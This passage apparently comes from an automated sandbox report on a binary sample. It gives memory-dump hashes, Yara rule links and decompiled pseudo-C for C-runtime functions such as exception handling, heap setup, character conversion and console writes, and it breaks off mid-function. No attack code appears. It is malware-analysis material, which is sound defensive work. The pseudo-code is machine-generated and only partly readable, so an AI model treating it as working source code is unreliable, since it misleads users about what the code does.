Instruction ID: e2596816a01724f242e870bb6af5a110992d2b01e99cb0a638c102520b6fb05c
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: 50F0FB35144644DFC216DF44D540B25FBA2EB89718F24C6A9E9490BB52C737D813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 023805F6 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c67c80068883e49bae94fe3105d40d7ea679bdfc3bd88d975237d133755c24
Instruction ID: 6670f776e827fb206d5b0da2e69ad96aac7ad2864f69e4b3f96d54df65486fa2
Opcode Fuzzy Hash: 11c67c80068883e49bae94fe3105d40d7ea679bdfc3bd88d975237d133755c24
Instruction Fuzzy Hash: 5AE06D766006009BD650CF0AEC41456FB94EB84630B18C06BDC0D8B710E536F508CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 02552D20 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52425f5462ace3ea09f423de64e4bfd012de213506d122a2dbf910bd21017dd
Instruction ID: c394e598491147e0aeced129a4333231069624d0eba05ab500d885b343ac2347
Opcode Fuzzy Hash: f52425f5462ace3ea09f423de64e4bfd012de213506d122a2dbf910bd21017dd
Instruction Fuzzy Hash: C3D0123004C6A59FD24207A858767A47F24AB1B602F080DE3DCC6CD45292805013C756

Uniqueness

Uniqueness Score: -1.00%

Function 0255064F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6946811a9a9c603f5db7da4e1dfa13e4c38613cc4d67a84e622527a162d05e
Instruction ID: 9d0224e494977027372438cb6059d64cc57c49533b90b4f5544f3c786bc60cec
Opcode Fuzzy Hash: 7a6946811a9a9c603f5db7da4e1dfa13e4c38613cc4d67a84e622527a162d05e
Instruction Fuzzy Hash: 06D0A7B34892A09FC3554BB05C6E5F8BBE4EE973047044CE7DC4046423D5367593DA16

Uniqueness

Uniqueness Score: -1.00%

Function 025502A1 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b8a504dd55adb93bf5da8dd8576f36b9ebb75626bfd3c0edc8b2810bb1a4ee
Instruction ID: 0b1793068301261d7b969954338aacf12869baa09667a5b0e746b6d16910c71f
Opcode Fuzzy Hash: a8b8a504dd55adb93bf5da8dd8576f36b9ebb75626bfd3c0edc8b2810bb1a4ee
Instruction Fuzzy Hash: D8E0C23100C765DFC3529BA8F4A58E17BF4BF4B2003088D8BE0868B955C620EC06C715

Uniqueness

Uniqueness Score: -1.00%

Function 0255016F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2074d980514930a1d464d5e4b068b306674e6fbe9addb5848b773a2a333dd8c2
Instruction ID: db469e4b2f5dd4ec2a190ff3e29bdc37c0b89620f2caa4b55a3e257cf6753cfe
Opcode Fuzzy Hash: 2074d980514930a1d464d5e4b068b306674e6fbe9addb5848b773a2a333dd8c2
Instruction Fuzzy Hash: 65E02B33662304DFCB157B70E45D46C37A8EF4622130009B9D422C76C0FE3EE4A0CA08

Uniqueness

Uniqueness Score: -1.00%

Function 02550180 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8f9b8ffca45e9c8d8967e93bf46bf9929f304d778d4d610cb432a53a7ea4af
Instruction ID: 54de880f3d5b79684a8b9722b8d4a5492c8f4adb9de00826dbb1b53b6052775e
Opcode Fuzzy Hash: fa8f9b8ffca45e9c8d8967e93bf46bf9929f304d778d4d610cb432a53a7ea4af
Instruction Fuzzy Hash: 0CD0C931661304DBCB097BB0A01D42837ADAB49245340087CD80686740EE36A860CA08

Uniqueness

Uniqueness Score: -1.00%

Function 02550660 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9792fe2eeaaa43a076eaea2fb9aa9b3bd9fff409ec0c94944f7351269a744415
Instruction ID: 46120a96786f46df40b07432171dad07a41731f831a7046370203c84f5bc3a2d
Opcode Fuzzy Hash: 9792fe2eeaaa43a076eaea2fb9aa9b3bd9fff409ec0c94944f7351269a744415
Instruction Fuzzy Hash: 60C09B71485274CED25456B1681943DB29976D5305754CC37AD01001658A76B461D959

Uniqueness

Uniqueness Score: -1.00%

Function 02552EC0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e39fedf6deee74551c16ca042c3ddfcad6d0fab409242f1f2f298d57afcc17
Instruction ID: 0c1a7cf3f1cad2f8cb3bdbc3d128bd0a22e9f7aa5deb90040b388479d846ad22
Opcode Fuzzy Hash: 82e39fedf6deee74551c16ca042c3ddfcad6d0fab409242f1f2f298d57afcc17
Instruction Fuzzy Hash: B8B012302482080B574057F13C0CB22378C554040574004659C0CC0100F680D0E02244

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040446F Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x58c4579
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}

0x0040446f
0x0040446f
0x0040446f
0x0040447a
0x0040447f
0x00404481
0x00404488
0x00404489
0x0040448b
0x0040448e
0x00404493
0x00404493
0x0040449f
0x004044b2
0x004044c0
0x004044c6
0x004044cc
0x004044d2
0x004044d8
0x004044de
0x004044e4
0x004044ea
0x004044f0
0x004044f6
0x004044fd
0x00404504
0x0040450b
0x00404512
0x00404519
0x00404520
0x00404521
0x0040452a
0x00404530
0x00404533
0x00404539
0x00404546
0x0040454f
0x00404558
0x00404561
0x0040456f
0x00404571
0x0040457e
0x00404586
0x00404592
0x00404595
0x0040459a
0x004045a1
0x004045a9

APIs

IsDebuggerPresent.KERNEL32 ref: 00404567
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E

Memory Dump Source

Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 004067FE Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x004067fe
0x00406806
0x0040680e

APIs

GetProcessHeap.KERNEL32 ref: 004067FE

Memory Dump Source

Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x58c4579
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x58c4579
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x58c4579
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8 Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
